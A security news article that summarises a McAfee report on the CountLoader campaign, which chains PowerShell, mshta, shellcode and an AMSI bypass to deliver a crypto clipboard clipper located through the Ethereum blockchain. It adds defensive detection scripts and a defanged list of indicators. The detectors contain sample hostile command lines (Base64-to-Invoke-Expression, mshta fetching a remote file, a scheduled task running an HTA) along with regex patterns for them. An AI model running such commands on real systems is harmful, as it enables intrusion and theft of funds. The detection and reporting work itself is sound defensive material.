CyberSecurityNews

Malware Campaign Uses JavaScript, PowerShell, and Shellcode to Deliver Crypto Clipper


A wave of well-crafted malware is quietly draining cryptocurrency from users across the globe, and the attackers behind it have gone to great lengths to stay hidden.

Researchers have uncovered a large-scale campaign built around a multi-stage loader called CountLoader, which chains together JavaScript, PowerShell, and shellcode to deliver a payload that intercepts and redirects cryptocurrency transactions.

The scope of this campaign is striking, with tens of thousands of machines now infected across multiple continents. The malware does not rely on a single trick.

It starts with a malicious EXE file that runs a PowerShell command, pulling down an obfuscated JavaScript loader and executing it through mshta.exe, a legitimate Windows utility that attackers frequently abuse because the operating system trusts it by default.

This lets the malware blend into normal activity, giving it time to settle in before any defenses can respond.

Analysts at McAfee Labs, who authored the research and shared details in a report with Cyber Security News (CSN), noted that the campaign reached roughly 86,000 unique infected machines.

On average, around 5,000 infected systems were connecting to command-and-control infrastructure every single minute. Infections were highest in India, followed by Indonesia and the United States, with a strong presence across Southeast Asia.

Beyond internet-based delivery, the malware also spreads through USB drives. When instructed by its command server, CountLoader replaces files on connected external drives with LNK shortcut files.


Opening one silently runs the malware while also opening the original file, so victims notice nothing unusual. About 9,000 infections were traced back to this USB-based method.

The end goal is a cryptocurrency clipper. Once loaded into memory, it monitors the clipboard in the background.

The moment a user copies a wallet address, the clipper replaces it with one controlled by the attacker, silently rerouting funds with no visible warning to the victim.

The infection chain is designed to avoid detection at every stage. After the initial EXE runs, a scheduled task fires every 30 minutes to maintain persistence from the very first step.

Infection Chain (Source – McAfee)

The PowerShell script then decodes a Base64 payload and runs it using Invoke-Expression, a common technique for executing hidden code without writing anything to disk.

CountLoader then takes control as an HTA file loaded through mshta.exe. It hides its window, attempts to erase its own file if run locally, and cycles through command servers until one responds.

Once connected, it performs an encrypted handshake, obtains a JWT, and sends back details about the infected host, including any installed cryptocurrency wallets or browser extensions.

The next stages involve a PowerShell packer that decrypts and launches a shellcode injector. Before injecting, the script disables AMSI, a Windows feature designed to catch malicious scripts, using a known public bypass.

The shellcode then loads the final payload directly into memory under systeminfo.exe, never touching the disk, making it significantly harder for security tools to detect.
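The chain above leaves several command-line traces a defender can match on: PowerShell decoding Base64 straight into Invoke-Expression, mshta.exe pulling remote content from a PowerShell parent, and a scheduled task whose action is a script host. The following detector is an added example, not code from the McAfee report or the article; it runs over constructed process-creation records in a simplified (image, parent, command line) shape standing in for Sysmon Event ID 1 or Windows 4688 data, and the URLs, paths and task name in the sample are placeholders rather than indicators from the report.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# A -EncodedCommand blob is Base64 over UTF-16LE text; this one is built here
# as a constructed sample, not captured from the campaign.
ENCODED_BLOB = base64.b64encode(
    "Invoke-Expression (Get-Content C:\\Users\\Public\\s.txt)".encode("utf-16le")
).decode()

# Constructed sample records: (process image, parent image, command line).
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("powershell.exe", "setup.exe",
     'powershell.exe -nop -w hidden -c "IEX([Text.Encoding]::UTF8.GetString('
     '[Convert]::FromBase64String($b)))"'),
    ("mshta.exe", "powershell.exe",
     "mshta.exe https://loader.example.invalid/Presentation.pdf"),
    ("schtasks.exe", "cmd.exe",
     'schtasks /create /sc minute /mo 30 /tn Updater /tr "mshta.exe C:\\Users\\Public\\u.hta"'),
    ("powershell.exe", "explorer.exe", "powershell.exe -EncodedCommand " + ENCODED_BLOB),
    ("notepad.exe", "explorer.exe", "notepad.exe C:\\notes.txt"),
]

ENC_RE = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)  # -e/-enc/-EncodedCommand
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
B64_RE = re.compile(r"frombase64string", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
TASK_RE = re.compile(
    r'/tr\s+"?[^"]*\b(mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32)(\.exe)?\b',
    re.IGNORECASE,
)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand blob (Base64 of UTF-16LE); None if it is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(image: str, parent: str, cmdline: str) -> List[str]:
    """Return the behaviour tags one process-creation record matches (empty if benign)."""
    tags: List[str] = []
    image, parent = image.lower(), parent.lower()
    if image in ("powershell.exe", "pwsh.exe"):
        match = ENC_RE.search(cmdline)
        if match:
            decoded = decode_encoded_command(match.group(1))
            if decoded is not None:
                tags.append("encoded_command")
                if IEX_RE.search(decoded) or B64_RE.search(decoded):
                    tags.append("encoded_command_invokes_iex")
        if B64_RE.search(cmdline) and IEX_RE.search(cmdline):
            tags.append("inline_base64_to_iex")
    if image == "mshta.exe":
        if URL_RE.search(cmdline):
            tags.append("mshta_remote_content")
        if parent in ("powershell.exe", "pwsh.exe"):
            tags.append("mshta_spawned_by_powershell")
    if image == "schtasks.exe" and "/create" in cmdline.lower() and TASK_RE.search(cmdline):
        tags.append("scheduled_task_runs_script_host")
    return tags


def scan(events: List[Tuple[str, str, str]]) -> List[Dict[str, object]]:
    """Run classify() over every record and keep only the ones that matched."""
    hits = []
    for image, parent, cmdline in events:
        tags = classify(image, parent, cmdline)
        if tags:
            hits.append({"image": image, "parent": parent, "cmdline": cmdline, "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['parent']} -> {hit['image']}: {', '.join(hit['tags'])}")
```

The encoded-command rule decodes the blob before matching, because a Base64 search for "Invoke-Expression" on the raw command line finds nothing; the scheduled-task rule keys on the /tr action rather than the task name, since the name is whatever the attacker chose.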

Cryptocurrency Clipper Delivered via EtherHiding

What sets the final payload apart is how it locates its command server. Rather than hard-coding a domain that can be blocked or taken down, the clipper uses a technique called EtherHiding, fetching the server address straight from the Ethereum blockchain.

Since the blockchain is decentralized, there is no single point defenders can shut down to cut the malware off.
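Two things an analyst can still do with an EtherHiding lookup are recognise it in network telemetry and decode what came back. A read of contract state goes out as a JSON-RPC `eth_call` to some public node, and a function that returns a `string` answers with an ABI-encoded blob: one 32-byte word giving the offset of the string, one giving its length, then the bytes padded to a 32-byte boundary. The script below is an added example, not code from McAfee or the article; the contract address, selector and host name in it are constructed placeholders, and the small encoder exists only to build the sample result.

```python
import json
from typing import Optional

WORD = 32  # every ABI slot is 32 bytes


def eth_call_target(http_body: str) -> Optional[str]:
    """If a captured request body is a JSON-RPC eth_call, return the contract address
    it reads from, else None. A non-wallet process issuing these is worth a look."""
    try:
        msg = json.loads(http_body)
    except json.JSONDecodeError:
        return None
    if not isinstance(msg, dict) or msg.get("method") != "eth_call":
        return None
    params = msg.get("params") or []
    if params and isinstance(params[0], dict):
        return params[0].get("to")
    return None


def decode_eth_call_string(result_hex: str) -> Optional[str]:
    """ABI-decode a `string` return value from an eth_call result; None if malformed."""
    hexstr = result_hex[2:] if result_hex.startswith("0x") else result_hex
    try:
        data = bytes.fromhex(hexstr)
    except ValueError:
        return None
    if len(data) < 2 * WORD:                      # need at least offset + length words
        return None
    offset = int.from_bytes(data[:WORD], "big")   # where the length word sits
    if offset + WORD > len(data):
        return None
    length = int.from_bytes(data[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(data):                # declared length runs past the payload
        return None
    try:
        return data[start:start + length].decode("utf-8")
    except UnicodeDecodeError:
        return None


def abi_encode_string(text: str) -> str:
    """Inverse of the decoder, used only to build the constructed sample below."""
    raw = text.encode("utf-8")
    padded = raw + b"\x00" * (-len(raw) % WORD)
    return "0x" + (WORD.to_bytes(WORD, "big") + len(raw).to_bytes(WORD, "big") + padded).hex()


PLACEHOLDER_CONTRACT = "0x" + "0" * 39 + "1"   # placeholder, not the campaign's contract
PLACEHOLDER_HOST = "c2.example.invalid"        # constructed value, not a real indicator
SAMPLE_REQUEST = json.dumps({
    "jsonrpc": "2.0", "id": 1, "method": "eth_call",
    "params": [{"to": PLACEHOLDER_CONTRACT, "data": "0x" + "0" * 8}, "latest"],
})
SAMPLE_RESULT = abi_encode_string(PLACEHOLDER_HOST)

if __name__ == "__main__":
    print("eth_call against", eth_call_target(SAMPLE_REQUEST))
    print("decoded string:", decode_eth_call_string(SAMPLE_RESULT))
```

Because the node is public and the contract is just data, blocking is impractical; the practical control is the process context: an RPC client that is not a wallet or a developer tool is the anomaly, and the decoded string is what to feed into DNS and proxy blocks.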

Global Distribution of CountLoader Infections (Source – McAfee)

Once the server address is retrieved, the clipper silently monitors clipboard contents and supports multiple cryptocurrency formats, meaning it can swap Bitcoin, Ethereum, and other wallet addresses without the victim noticing.
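The telltale of a clipper on the host side is the clipboard itself: a wallet address is copied and, milliseconds later, the clipboard holds a different address of the same family although the user copied nothing new. The check below is an added example, not code from the report; it works over a constructed stream of timestamped clipboard snapshots, the kind a poller would collect, and the addresses in it are synthetic strings that only satisfy the format patterns. The two-second threshold is a heuristic chosen here, not a figure from the article.

```python
import re
from typing import Dict, List, Optional, Tuple

# Address families the check recognises (format only; no checksum validation).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,87}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "trx": re.compile(r"^T[a-km-zA-HJ-NP-Z1-9]{33}$"),
}


def wallet_family(text: str) -> Optional[str]:
    """Name the address family `text` looks like, or None for ordinary clipboard content."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def detect_substitutions(snapshots: List[Tuple[int, str]],
                         max_gap_ms: int = 2000) -> List[Dict[str, object]]:
    """Walk (timestamp_ms, content) snapshots and report each case where one wallet
    address became a different address of the same family within max_gap_ms of the
    previous change. A person rarely copies two distinct addresses of the same kind
    seconds apart; a clipper rewrites the clipboard within milliseconds of the copy."""
    alerts: List[Dict[str, object]] = []
    last_text: Optional[str] = None
    last_change_ms = 0
    for ts, text in snapshots:
        if text == last_text:          # the poller saw no change this tick
            continue
        if last_text is not None:
            before, after = wallet_family(last_text), wallet_family(text)
            if before is not None and before == after and ts - last_change_ms <= max_gap_ms:
                alerts.append({"family": after, "copied": last_text.strip(),
                               "replaced_with": text.strip(), "after_ms": ts - last_change_ms})
        last_text, last_change_ms = text, ts
    return alerts


# Constructed snapshot stream with synthetic addresses (format-valid only, not real wallets).
BTC_COPIED, BTC_SWAPPED = "1" + "A" * 33, "1" + "B" * 33
ETH_COPIED, ETH_SWAPPED = "0x" + "ab" * 20, "0x" + "cd" * 20
SAMPLE_SNAPSHOTS = [
    (0, "meeting notes"),
    (1000, BTC_COPIED),
    (1040, BTC_SWAPPED),   # rewritten 40 ms after the copy: clipper behaviour
    (1100, BTC_SWAPPED),   # unchanged on the next poll
    (5000, ETH_COPIED),
    (9000, ETH_SWAPPED),   # a different address four seconds later: ordinary user activity
]

if __name__ == "__main__":
    for alert in detect_substitutions(SAMPLE_SNAPSHOTS):
        print(f"{alert['family']}: {alert['copied']} -> {alert['replaced_with']} "
              f"after {alert['after_ms']} ms")
```

Reading the live clipboard is left to the caller (on Windows, a listener for WM_CLIPBOARDUPDATE or periodic Get-Clipboard polls); the logic here is what to do with each observation. Whatever the tooling, the user-level control in the article still applies: compare the first and last characters of the pasted address with the source before sending.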

Researchers measured the true scale of this campaign by registering a backup C2 domain and sinkholing infected traffic to their own server, effectively turning the attackers’ infrastructure against them.

To reduce risk, users should avoid running EXE files from untrusted sources, treat unknown USB drives with caution, and always verify wallet addresses before sending cryptocurrency.

Watching for unfamiliar scheduled tasks on Windows and keeping security software updated can also help detect this threat before serious damage is done.

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| File Hash (SHA256) | 5f9ff671955a6d551595f9838aed063c496da5039be0d222fe84f96cb3e1d32a | EXE Stage 1 |
| URL | https://memory-scanner[.]cc/Presentation[.]pdf | PowerShell Stage 2 download URL |
| File Hash (SHA256) | 3c278499c5e3ced3bf1a6a7287808c5267075f1dec0aa5c7be2c4c444f33f2bc | PowerShell Stage 2 script |
| URL | https://memory-scanner[.]cc/ | CountLoader download URL |
| URL | https://hell1-kitty[.]cc/update1_usb_usb_usb[.]VOcx4wEV8 | CountLoader download URL |
| File Hash (SHA256) | c68e436d4cb984db026210806f50d0c81eec5f6e4860197dab91fab6f31ef796 | CountLoader v3.3 |
| File Hash (SHA256) | e2faad8111e7d47349cbc549b85e62231b8678057906bc813aad7242fa95ae63 | CountLoader v4.1 |
| File Hash (SHA256) | e5e1d8ec4cd109df290752ee3d4b2cbc9de6df4360e9983548f1bc6b1d088540 | CountLoader v4.1 |
| Domain | hell1-kitty[.]cc | CountLoader C2 domain |
| Domain | alphazero1-endscape[.]cc | CountLoader C2 domain |
| Domain | api-microservice-us1[.]com | CountLoader C2 domain |
| Domain | bucket-aws-s1[.]com | CountLoader C2 domain |
| Domain | bucket-aws-s2[.]com | CountLoader C2 domain |
| Domain | fileless-storage-s3[.]cc | CountLoader C2 domain |
| Domain | globalsnn1-new[.]cc | CountLoader C2 domain |
| Domain | globalsnn2-new[.]cc | CountLoader C2 domain |
| Domain | globalsnn3-new[.]cc | CountLoader C2 domain |
| Domain | handle-me-sv1[.]com | CountLoader C2 domain |
| Domain | hardware-office[.]cc | CountLoader C2 domain |
| Domain | health-smooth-eu1[.]com | CountLoader C2 domain |
| Domain | health-smooth-eu2[.]com | CountLoader C2 domain |
| Domain | health-smooth-eu3[.]com | CountLoader C2 domain |
| Domain | holiday-updateservice[.]com | CountLoader C2 domain |
| Domain | memory-protection-layer1[.]cc | CountLoader C2 domain |
| Domain | memory-protection-layer2[.]cc | CountLoader C2 domain |
| Domain | microservice-update-s1-bucket[.]cc | CountLoader C2 domain |
| Domain | microservice-update-s2-bucket[.]cc | CountLoader C2 domain |
| Domain | my-smart-house1[.]com | CountLoader C2 domain |
| Domain | polystore9-servicebucket[.]cc | CountLoader C2 domain |
| Domain | s3-updatehub[.]cc | CountLoader C2 domain |
| File Hash (SHA256) | 10593dbe9edfde7943fdaadd7882f190216b2f6502667daf701088a6e810deaf | USB LNK file |
| File Hash (SHA256) | 0a69a9cc75d65774e5eb90a4a739bd4335d33b176dc4923acb691bd45af66bdf | USB LNK file |
| File Hash (SHA256) | 27c6a6bda2c0ef3ecb78dad9c6bb7c3abaf2e32b3ad96f372a0102c0c9c0f08d | USB LNK file |
| File Hash (SHA256) | 2cd449f1bb24f05d2e240812a74bd62f2583bbbe4d0ccc9ae5736240e29a0068 | USB LNK file |
| File Hash (SHA256) | 30dcd5c71beb76d2f8df768d5fd9e9145cb8fbbfc951a63b969d26d3b64002b9 | USB LNK file |
| File Hash (SHA256) | dd4c7f5aae404816cf447b8090b620c1a1971a35c6791116aa3f871f00ae011b | USB LNK file |
| File Hash (SHA256) | 42a1fc74334c9a3b8720c79df55f84c7398bd31609eb10581e8c7155835498e3 | USB LNK file |
| File Hash (SHA256) | 9c0d334aac5a6f66016dc5ce8df75c46d519a4e6d16c68cf2b1405c81189186d | USB LNK file |
| File Hash (SHA256) | 44f6313e9542c0d51937a70160fe4137012905d8c79ad27ccc0021788ecfaa4e | USB LNK file |
| URL | https://hell1-kitty[.]cc/gamecenter[.]fileManager | Payload launcher URL |
| URL | https://hardware-office[.]cc/foundation[.]halflife | Payload launcher URL |
| File Hash (SHA256) | cbdfb46b9265a3dfb3bc6b0aade472dde28b1660dbd3ded3b67b1530b4497cca | Payload launcher |
| File Hash (SHA256) | 4a5e1d6ee1217e1fbacf54fc6017fbf9d24a25078266b02358d56a9c7437ceb7 | PowerShell packer |
| File Hash (SHA256) | 05becb67d8bf1e49fcfccb0d346b82368a2b1c2bf07316078c364c7b020154de | Shellcode injector |
| File Hash (SHA256) | 44daa1b68737b55a711963eec211c7c018bcba4cb6d68c286a4b45ea781a7d73 | Shellcode |
| File Hash (SHA256) | dc602cb53a9c24abfcdaadf0ca8256b5fb5cac6d91d20ed8431bdaaf51c0cafe | Final clipper payload |
| URL | https://edr-security-bucket1[.]cc/ | Payload C2 server URL |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
